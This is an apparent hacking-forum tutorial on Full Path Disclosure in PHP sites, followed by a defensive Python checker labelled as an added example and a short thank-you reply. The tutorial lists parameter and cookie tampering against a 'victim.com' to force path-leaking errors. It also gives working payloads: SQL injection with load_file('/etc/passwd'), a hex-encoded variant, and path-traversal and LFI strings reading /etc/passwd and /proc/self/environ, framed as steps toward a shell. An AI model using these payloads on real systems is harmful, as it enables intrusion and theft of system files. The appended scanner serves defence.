[Tutorial] : Full Path Disclosure (+Updated)

#1
Full Path Disclosure, also known as FPD, is a 'vuln' that pretty much does what it says: it shows the full path of the website.

Now, FPD can't really be 'exploited', but together with other vulns it can help you further exploit the website. For example, FPD would be useful for INTO OUTFILE statements when trying to spawn a shell during SQLi, or when load_file() doesn't work, and so on.

The most common error shown in FPD would be:


Code:
Warning: function(function.name) [Function_name]: Some brief summary in /home/user/public_html/website/index.php on line 123




Tutorial

Method #1 : Switching parameter into an array


Code:
www.victim.com/index.php?id=3

=>

www.victim.com/index.php?id[]=3


Method #2 : Changing an integer to a string


Code:
www.victim.com/index.php?id=3

=>

www.victim.com/index.php?id=huey


Method #3 : Changing the cookie output to null

Code:
PHPSESSID=13882931834931984318

=>

PHPSESSID=


Method #4 : Using wrong file/page name

Code:
www.victim.com/index.php?page=views.php

=>

www.victim.com/index.php?page=huey.php



Method #5 : Changing the value

Code:
www.victim.com/index.php?id=3

=>

www.victim.com/index.php?id=3!
www.victim.com/index.php?id='3'
www.victim.com/index.php?id=3.1

Getting /etc/passwd

Code:
www.victim.com/index.php?id=3 UNION SELECT div 0 1,2,load_file('/etc/passwd'),4,5--

OR

www.victim.com/index.php?id=3 UNION SELECT div 0 1,2,load_file(0x2f6574632f706173737764),4,5--

AND

www.victim.com/index.php?page=../../etc/passwd%00

OR

www.victim.com/index.php?page=/proc/self/environ%00


FPD via phpinfo()

Code:
www.victim.com/phpinfo.php
www.victim.com/phpinfo/
www.victim.com/phpdetails.php



404 Page :: IIS Servers

Code:
www.victim.com/index.php

=>

www.victim.com/huey.php

This method usually works on .asp / .aspx sites.


Alright, that's the end of my tutorial.


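A defender's regression check for the leaks described in the post above, as an added example that is not part of the original post: it scans response bodies for PHP error text in the format quoted there and for exposed phpinfo() output. The function names, request paths and sample responses are constructed for illustration.

```python
import re

# PHP's default error text: "<Level>: <message> in <absolute path> on line <n>".
# The path may be POSIX (/home/...) or Windows (C:\inetpub\...).
PHP_ERROR = re.compile(
    r"(?P<level>Warning|Notice|Deprecated|Fatal error|Parse error)\s*:\s*"
    r".*?\s+in\s+(?P<path>(?:/|[A-Za-z]:\\).+?)\s+on\s+line\s+(?P<line>\d+)",
    re.IGNORECASE,
)
TAGS = re.compile(r"<[^>]+>")


def find_path_leaks(body):
    """Return (level, path, line) for each PHP error in body that exposes a path."""
    text = TAGS.sub("", body)  # html_errors=On wraps level, path and line in <b>
    return [(m["level"], m["path"], int(m["line"]))
            for m in PHP_ERROR.finditer(text)]


def audit(responses):
    """Map each request to its findings; requests with no findings are omitted."""
    report = {}
    for request, body in responses.items():
        findings = find_path_leaks(body)
        if "phpinfo()" in body:  # heuristic: marker text in phpinfo() output
            findings.append(("phpinfo", None, None))
        if findings:
            report[request] = findings
    return report


# Constructed sample responses (not captured from any real site).
SAMPLES = {
    "/index.php?id[]=3":
        "Warning: function(function.name) [Function_name]: Some brief summary "
        "in /home/user/public_html/website/index.php on line 123",
    "/index.php?page=huey.php":
        "<br />\n<b>Warning</b>:  include(huey.php): failed to open stream "
        "in <b>C:\\inetpub\\wwwroot\\site\\index.php</b> on line <b>7</b><br />",
    "/index.php?id=huey":
        "<h1>Something went wrong</h1><p>Reference: 4f2a</p>",
    "/phpinfo.php":
        "<title>phpinfo()</title><h1>PHP Version 7.4</h1>",
}

if __name__ == "__main__":
    for request, findings in audit(SAMPLES).items():
        print(request, findings)
```

Setting `display_errors = Off` and `log_errors = On` in php.ini keeps these messages out of responses and in the server log; a check like this then confirms the setting stays in place after deployments.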
#2
thank you very much